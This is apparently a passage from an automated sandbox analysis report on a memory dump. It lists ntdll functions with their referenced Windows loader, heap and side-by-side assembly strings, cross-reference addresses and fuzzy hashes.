                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00E32178
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00E3219F
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00E321BF
                                                                        • SXS: %s() passed the empty activation context, xrefs: 00E32165
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00E32180
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: ebff07da59abd067b5859319c2417e561964167735c749e7400058462a8e78aa
                                                                        • Instruction ID: 1e304b8a358e2154febc2b2f002441ce5a52058c694a41d4b18d5a8dfa1a26af
                                                                        • Opcode Fuzzy Hash: ebff07da59abd067b5859319c2417e561964167735c749e7400058462a8e78aa
                                                                        • Instruction Fuzzy Hash: 0531E536B412287BEB219AA58C89F7B7B78DB55B50F164069FB44BB281D2709E00C6F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                        • API String ID: 0-3393094623
                                                                        • Opcode ID: 4810cbb3a1bde0729142c54d77c0b6d18f3d5b10beb0ab9e8326729bda1839a6
                                                                        • Instruction ID: c35d5fe4e93eaf70735885e8c2775cb4fd25af5d512b968f2862d058bfe76e8f
                                                                        • Opcode Fuzzy Hash: 4810cbb3a1bde0729142c54d77c0b6d18f3d5b10beb0ab9e8326729bda1839a6
                                                                        • Instruction Fuzzy Hash: AD0235715093518FC720CF68D0A0BABF7E5AF88704F55891FE9999B350E772D848CBA2
                                                                        APIs
                                                                          • Part of subcall function 00E02DF0: LdrInitializeThunk.NTDLL ref: 00E02DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E00BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E00BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E00D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E00D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: f3e5cda32a39c0801cb4daf1d551a05f22325c19b39c4d11c32aa0f8a6fec915
                                                                        • Instruction ID: 104713fd0d834efa42be176c8249beee071efb7fba91799bd4d97efb25aa9662
                                                                        • Opcode Fuzzy Hash: f3e5cda32a39c0801cb4daf1d551a05f22325c19b39c4d11c32aa0f8a6fec915
                                                                        • Instruction Fuzzy Hash: 42426D71900715DFDB20CF64C885BAABBF5FF44314F1445AAE989EB282D770AA85CF60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                        • API String ID: 0-2518169356
                                                                        • Opcode ID: 3b25fa257a14db0c011275e4405c4a5e107a9d57592a33b8e50f619fbde2d640
                                                                        • Instruction ID: 98352033573f5a17c8e931be8e6d63787c041b7bd8f774d314109fa0c5ff133d
                                                                        • Opcode Fuzzy Hash: 3b25fa257a14db0c011275e4405c4a5e107a9d57592a33b8e50f619fbde2d640
                                                                        • Instruction Fuzzy Hash: 8A91CE76E01A198BCB20CF58D881ABEB7B0EF88314F595169E814F7391D735DE01CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: baccf48a68f3478d66be70a35e1eb93eb876bf0122d60ee1e4b0258f1b08f48a
                                                                        • Instruction ID: 8e99664f843c566ca7b72813a71763a5c7e12cbc36d4e38c71dbd1bad4bb50ce
                                                                        • Opcode Fuzzy Hash: baccf48a68f3478d66be70a35e1eb93eb876bf0122d60ee1e4b0258f1b08f48a
                                                                        • Instruction Fuzzy Hash: 3B13A170A04655DFDB25CF68C8907A9BBF1FF49304F1881AAD849AB381DB34AD45DFA0
                                                                        Strings
                                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 00E27D56
                                                                        • SsHd, xrefs: 00DDA885
                                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 00E27D39
                                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 00E27D03
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                        • API String ID: 0-2905229100
                                                                        • Opcode ID: 4f7c833ad30d4f20b2c01ff2cff3a15c2eb3ae95b3aa58e28b056322bf187852
                                                                        • Instruction ID: 3d25e6b3ce47bb21444f2896c618299efea41c2d9a02b214b7055012281a8be3
                                                                        • Opcode Fuzzy Hash: 4f7c833ad30d4f20b2c01ff2cff3a15c2eb3ae95b3aa58e28b056322bf187852
                                                                        • Instruction Fuzzy Hash: 57D19F31A00219DFCB24CFA8D8D0AADB7B5FF48314F19916AE845AB351D371EC81CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: b604cb7de1619ca3d6ce256165259d91646e2f807f596595d58e1ec6e13f6f4e
                                                                        • Instruction ID: aeb5a641f513e70f30da5b613133e006d4d6cac188397323db282e084a6de5be
                                                                        • Opcode Fuzzy Hash: b604cb7de1619ca3d6ce256165259d91646e2f807f596595d58e1ec6e13f6f4e
                                                                        • Instruction Fuzzy Hash: D4C1897420838A9FC715DF18C044B6AB7E4BF84708F04896EF99A9B251E774CA49CB67
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00DF8421
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00DF855E
                                                                        • LdrpInitializeProcess, xrefs: 00DF8422
                                                                        • @, xrefs: 00DF8591
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: 8d9d4d3d322560ad45d9cbe2418eb903367bb6c7ac9115b5c478851d7e734de0
                                                                        • Instruction ID: 8c358be52728b8d93f43003fa9163fe3ce55329c90b5e7e854fbcc8a430abef6
                                                                        • Opcode Fuzzy Hash: 8d9d4d3d322560ad45d9cbe2418eb903367bb6c7ac9115b5c478851d7e734de0
                                                                        • Instruction Fuzzy Hash: E391BE72508745AFDB21EF20CC45F7BBBE8EB84744F40492EF684A6291D730D944DB62
                                                                        Strings
                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00E254ED
                                                                        • HEAP[%wZ]: , xrefs: 00E254D1, 00E25592
                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00E255AE
                                                                        • HEAP: , xrefs: 00E254E0, 00E255A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                        • API String ID: 0-1657114761
                                                                        • Opcode ID: 0b97f489349e337a8056af1549876a6959de4bc56005460d8c9ec3db958ad20d
                                                                        • Instruction ID: 425a9f5c32f4b23123fd962fbbdd0dff8f693202f196d92c85abe3879e0d0a11
                                                                        • Opcode Fuzzy Hash: 0b97f489349e337a8056af1549876a6959de4bc56005460d8c9ec3db958ad20d
                                                                        • Instruction Fuzzy Hash: 16A1D4306006459FD724CF68C841BBABBE2FF95304F18856BE49A9B782D774E844CBB1
                                                                        Strings
                                                                        • .Local, xrefs: 00DF28D8
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00E322B6
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00E321D9, 00E322B1
                                                                        • SXS: %s() passed the empty activation context, xrefs: 00E321DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: eb75b2e57ffe0a0d3ebd89543bff64855e535b008e71ca4d63e7b3e7db5ba8f0
                                                                        • Instruction ID: b5abab217d793f3bf656093e0990ef3a4e4eddf494948ff70ddd59953a4bd419
                                                                        • Opcode Fuzzy Hash: eb75b2e57ffe0a0d3ebd89543bff64855e535b008e71ca4d63e7b3e7db5ba8f0
                                                                        • Instruction Fuzzy Hash: D4A1803194122D9FCB24CF64DC88BB9B3B5BF58314F2541EAEA48A7251D7709E80CFA0
                                                                        Strings
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00E33456
                                                                        • RtlDeactivateActivationContext, xrefs: 00E33425, 00E33432, 00E33451
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00E33437
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00E3342A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: bf44e34b0093cc6d44d340e56fc05f119b0f1da5a6a7af919db014a963e4e7d7
                                                                        • Instruction ID: 82889f70b701f42eea42224a59034bb080f3a57bcd32763b1c967dae26d8ad05
                                                                        • Opcode Fuzzy Hash: bf44e34b0093cc6d44d340e56fc05f119b0f1da5a6a7af919db014a963e4e7d7
                                                                        • Instruction Fuzzy Hash: 0D6106326407159FC722CF28C846F3BB7A5EF90B64F198519F965AB291D734ED00CBA1
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00E20FE5
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00E21028
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00E210AE
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00E2106B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: 6ca1533b0eb5ee2e8093aff6eb597cc7deba848b88073a0fd910969e18b14d79
                                                                        • Instruction ID: 4f86f58794095ce9b0ebae6873875410f5f5b896f7f67d9bda9be129ef2f84f6
                                                                        • Opcode Fuzzy Hash: 6ca1533b0eb5ee2e8093aff6eb597cc7deba848b88073a0fd910969e18b14d79
                                                                        • Instruction Fuzzy Hash: 6B71CCB1A04305AFCB20EF14C885F9B7BE8AF94764F141568F9489B287D734D589CBE2
                                                                        Strings
                                                                        • apphelp.dll, xrefs: 00DE2462
                                                                        • LdrpDynamicShimModule, xrefs: 00E2A998
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00E2A9A2
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00E2A992
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        • Opcode ID: 03b11a9cde8c523d291e9f58937428a875d6ccdaa7e2f66843a308d05010762f
                                                                        • Instruction ID: 93d6b11160641c205596de7572bfa34d5717128a2650e466286b70f46324ed1c
                                                                        • Opcode Fuzzy Hash: 03b11a9cde8c523d291e9f58937428a875d6ccdaa7e2f66843a308d05010762f
                                                                        • Instruction Fuzzy Hash: 2E312A71A00211AFDB24AF6AFC46ABB77B5FF84704F290129F801772A1D7709D85C761
                                                                        Strings
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00DD327D
                                                                        • HEAP[%wZ]: , xrefs: 00DD3255
                                                                        • HEAP: , xrefs: 00DD3264
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: 325ed9aff5c37d8814393218a8639ed8cbf9cb075d4aa78c6e7d2bd386219993
                                                                        • Instruction ID: 4a6aae8580274385a98745973e90807843e18c809fddd9d8d7f53ec5fc0f7bc7
                                                                        • Opcode Fuzzy Hash: 325ed9aff5c37d8814393218a8639ed8cbf9cb075d4aa78c6e7d2bd386219993
                                                                        • Instruction Fuzzy Hash: 2E92BC71A042499FDB25CF68C440BBEBBF1FF58300F18845AE899AB391D735AA45CF61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                        • API String ID: 0-1670051934
                                                                        • Opcode ID: e9caba5b5ee087c64e5473c2f5955aef3dc20ba57b5791046c2ccdcc87894482
                                                                        • Instruction ID: 624f3b60c379a6dce86993f4e932c92dc3ca65ce1781035ea0310676ce866711
                                                                        • Opcode Fuzzy Hash: e9caba5b5ee087c64e5473c2f5955aef3dc20ba57b5791046c2ccdcc87894482
                                                                        • Instruction Fuzzy Hash: 4222C2726047028FD724CF29C89162AFBE1BBD4315F249D2EF9DAA7690D770E948CB41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: caff98da4396ec575ed026ae2e3551c8926403c6111d4eff0fb1010177c41f09
                                                                        • Instruction ID: 44f7bddbf55dd13d0a8fff5310417d20aa0f887046af68f34d2aecec4056b38f
                                                                        • Opcode Fuzzy Hash: caff98da4396ec575ed026ae2e3551c8926403c6111d4eff0fb1010177c41f09
                                                                        • Instruction Fuzzy Hash: B1F19C31A00A05DFDB15DF68D994B6ABBF5FB84304F24816AE456AB392D730ED41CFA0
                                                                        Strings
                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00DC1728
                                                                        • HEAP[%wZ]: , xrefs: 00DC1712
                                                                        • HEAP: , xrefs: 00DC1596
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: c1a88653109d3cd6ae29ff712d501f80e71eaa74d1fcd866e56311045b44c84e
                                                                        • Instruction ID: 6192c76b0cb8bb68cd0286038c683adab3b0ca60848dc857de384c319e25c4de
                                                                        • Opcode Fuzzy Hash: c1a88653109d3cd6ae29ff712d501f80e71eaa74d1fcd866e56311045b44c84e
                                                                        • Instruction Fuzzy Hash: F9E1F234A14652DFDB19CF28C451BBABBF1EF46300F28856EE4D69B286D734E844CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        • API String ID: 0-1077428164
                                                                        • Opcode ID: f9fc6d5fc27ce22d45c6cbde0940ee22fffb9e274a12162654f6f0e1fce5dca7
                                                                        • Instruction ID: 33f04aa46cac36436cc9715e6cae448210392517e5c22c4cd1354f93f8ae1963
                                                                        • Opcode Fuzzy Hash: f9fc6d5fc27ce22d45c6cbde0940ee22fffb9e274a12162654f6f0e1fce5dca7
                                                                        • Instruction Fuzzy Hash: 5BC2AB716083918FDB65DF25C881BABBBE5AF88744F18892DF9C9D7241D734D804CBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: 1c7fa30bb2396210075aea37e46cacfa1b04707fdd1fa47ffb61edffc6e856f0
                                                                        • Instruction ID: d8e2be56e12c765db0444f4916e8e36530cb1ebb08650523aca0babaefd89ce4
                                                                        • Opcode Fuzzy Hash: 1c7fa30bb2396210075aea37e46cacfa1b04707fdd1fa47ffb61edffc6e856f0
                                                                        • Instruction Fuzzy Hash: 6EA169719416299BDB31AF24CC88BEAB7B8EF48704F1051EAE909E7250D7359EC4CF60
                                                                        Strings
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 00E2A10F
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00E2A121
                                                                        • LdrpCheckModule, xrefs: 00E2A117
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        • Opcode ID: 21d54471aedf6a6090cf7692710322be808846ffa8247b5945ba850d6307c4ec
                                                                        • Instruction ID: 5258a7a3e85698ff05f9cab1e6cc7048b713da6b046ec8351d3ca5d14ebdfb7f
                                                                        • Opcode Fuzzy Hash: 21d54471aedf6a6090cf7692710322be808846ffa8247b5945ba850d6307c4ec
                                                                        • Instruction Fuzzy Hash: A971E071A00205DFCB14EF69DD81ABEBBF4EB44704F28452DE442E7261E774AD85CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: 578a9d7887342ed3074ea2aacac617fc4eb54d0423fe57807657220f38063309
                                                                        • Instruction ID: 1f01cc411049fae2b2248180d128bc9048bf84cd4b772eaf5da6e6da1793c9ef
                                                                        • Opcode Fuzzy Hash: 578a9d7887342ed3074ea2aacac617fc4eb54d0423fe57807657220f38063309
                                                                        • Instruction Fuzzy Hash: 3361E031604701DFDB28CF28D540B6ABBE1FF85304F25956AE49A9F396C770E881CBA0
                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 00E6DC12
                                                                        • HEAP: , xrefs: 00E6DC1F
                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00E6DC32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                        • API String ID: 0-3815128232
                                                                        • Opcode ID: efa79588e611008b0026540e0d862d76ea65aacfbe865dab0b085c2713bed5d8
                                                                        • Instruction ID: d1942e59d10a6a86e6262c68c31e4b3a15089def640a97309cc45577a3bfd402
                                                                        • Opcode Fuzzy Hash: efa79588e611008b0026540e0d862d76ea65aacfbe865dab0b085c2713bed5d8
                                                                        • Instruction Fuzzy Hash: 83514735B8C1148EE724CB2AEC447B2B3E1DB453C8F96584AE4C2EB189D775D806EB60
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00E382E8
                                                                        • Failed to reallocate the system dirs string !, xrefs: 00E382D7
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 00E382DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: e777bcee7b9850a08126c25b414e9aaa06f0a5835a128f6763c37162dc988df3
                                                                        • Instruction ID: 5256e7066047d63bfe0ceaf697883e0626901f8140091411a49f2b87e7bdab8d
                                                                        • Opcode Fuzzy Hash: e777bcee7b9850a08126c25b414e9aaa06f0a5835a128f6763c37162dc988df3
                                                                        • Instruction Fuzzy Hash: DD41F471510308EFCB20EB65ED45B6B77E8EF44750F155A2ABA44E32A1EB74D804CBB1
                                                                        Strings
                                                                        • @, xrefs: 00E7C1F1
                                                                        • PreferredUILanguages, xrefs: 00E7C212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00E7C1C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: 5616815f07d6ac8e63a39287601b9bb9fe148bd4e6423283b343ce3800fec495
                                                                        • Instruction ID: ab276aa68bb3428188a0256b21fa0e5e26425058151a4be474042faa7f39a15d
                                                                        • Opcode Fuzzy Hash: 5616815f07d6ac8e63a39287601b9bb9fe148bd4e6423283b343ce3800fec495
                                                                        • Instruction Fuzzy Hash: 6A416172A00659EBDB11DED4C845FEEB7BCEB14704F24806EE609F7291E7749E448B60
                                                                        Strings
                                                                        Memory Dump Source
